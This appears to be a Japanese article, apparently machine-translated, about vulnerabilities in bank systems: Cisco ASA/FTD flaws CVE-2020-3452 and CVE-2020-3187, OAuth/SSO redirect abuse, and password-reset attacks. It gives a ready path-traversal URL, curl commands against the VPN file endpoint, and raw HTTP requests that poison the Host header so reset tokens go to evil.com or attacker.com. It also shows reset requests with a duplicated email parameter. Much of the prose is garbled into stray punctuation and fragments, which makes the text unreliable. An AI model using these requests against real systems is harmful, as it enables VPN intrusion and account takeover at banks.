皆さん、こんにちは!
今日は、銀行システムのセキュリティの差し迫った問題について話し、一般的な脆弱性を分析し、現在の問題に基づいて結論を導き出します。
重要
繰り返しになりますが、作成者は、サイバー脅威からシステムを完全に保護する方法を示すことを保証するものではなく、注意を払う必要のある問題を示すことだけを望んでいます。
1. SSLVPNサービス
銀行は、Cisco SSLVPNサービスを使用して内部ネットワークへのリモートアクセスを整理することがよくあります。
, .. Cisco CVE-2020-3452 CVE-2020-3187
1.1. CVE-2020-3452
CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .
https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../
, .
1.2. CVE-2020-3187
/session_password.html 200
curl -k -s -i https://
Cisco-VPN/+CSCOE+/session_password.html
200? -
"/+CSCOU+/csco_logo.gif"
curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://
Cisco-VPN/+CSCOE+/session_password.html
VPN .
2. & OAuth
- (SSO) OAuth 2.0, , , .
GET /auth/sso/cb?code=[sso token account] HTTP/1.1
Host: bank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
CSRF . - .
SSO
SSO ,
.
SSO .
redirect_uri - url . / .
POST https://bank.com/reset.php HTTP/1.1
Accept: /
Content-Type: application/json
Host: evil.com
Host: bank.com
X-Forwarded-Host: attacker.com
Host: target.com
Host: attacker.com
email .
https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901
- . , .
.
POST /resetPassword
[…]
email=victim@email.com&email=attacker@email.com
リクエストでは、攻撃者が単に電子メールパラメータを複製し、認証トークンの送信先となるメールを指定したことがわかります。
出力
SSL VPNでもGlobalProtectでも、サービスを最新の状態に保ちます。
認証を安全に保つ
また、ヒントとして、Webアプリケーションファイアウォール(WAF )を使用して、 コードの変更によって引き起こされる脆弱性の悪用を防ぎます。
がんばろう!ではごきげんよう。